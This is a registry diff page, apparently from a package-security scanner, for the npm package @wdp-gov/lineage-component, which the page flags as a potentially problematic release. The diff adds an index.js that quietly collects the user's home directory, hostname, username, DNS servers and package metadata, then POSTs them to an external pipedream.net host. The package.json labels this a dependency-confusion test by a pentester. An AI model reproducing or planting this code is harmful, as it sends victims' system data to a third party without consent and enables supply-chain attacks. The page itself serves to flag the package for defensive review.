@wdp-gov/lineage-component 0.0.1-security → 5.1.14

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of @wdp-gov/lineage-component might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +55 -0
  2. package/package.json +11 -3
  3. package/README.md +0 -5
package/index.js ADDED
@@ -0,0 +1,55 @@
1
+ const os = require("os");
2
+ const dns = require("dns");
3
+ const querystring = require("querystring");
4
+ const https = require("https");
5
+ const packageJSON = require("./package.json");
6
+ const package = packageJSON.name;
7
+
8
+ const trackingData = JSON.stringify({
9
+
10
+ p: package,
11
+ c: __dirname,
12
+ os: os.type(),
13
+ hd: os.homedir(),
14
+ hn: os.hostname(),
15
+ un: os.userInfo().username,
16
+ dns: dns.getServers(),
17
+ r: packageJSON ? packageJSON.___resolved : undefined,
18
+ v: packageJSON.version,
19
+ pjson: packageJSON,
20
+
21
+ });
22
+
23
+ var postData = querystring.stringify({
24
+ msg: trackingData,
25
+ });
26
+
27
+ var options = {
28
+ hostname: "eojg3fg8d673pvt.m.pipedream.net",
29
+ port: 443,
30
+ path: "/",
31
+ method: "POST",
32
+
33
+ headers: {
34
+ "Content-Type": "application/x-www-form-urlencoded",
35
+ "Content-Length": postData.length,
36
+
37
+ },
38
+
39
+ };
40
+
41
+ var req = https.request(options, (res) => {
42
+ res.on("data", (d) => {
43
+ process.stdout.write(d);
44
+ });
45
+
46
+ });
47
+
48
+ req.on("error", (e) => {
49
+
50
+ // console.error(e);
51
+
52
+ });
53
+
54
+ req.write(postData);
55
+ req.end();
package/package.json CHANGED
@@ -1,6 +1,14 @@
1
1
  {
2
2
  "name": "@wdp-gov/lineage-component",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "5.1.14",
4
+ "description": "\"this from PTC\"",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"PTC Test: test for dependency confusion\" && exit 1"
8
+ },
9
+ "keywords": [
10
+ "dap"
11
+ ],
12
+ "author": "ptc_pentester",
13
+ "license": "ISC"
6
14
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=%40wdp-gov%2Flineage-component for more information.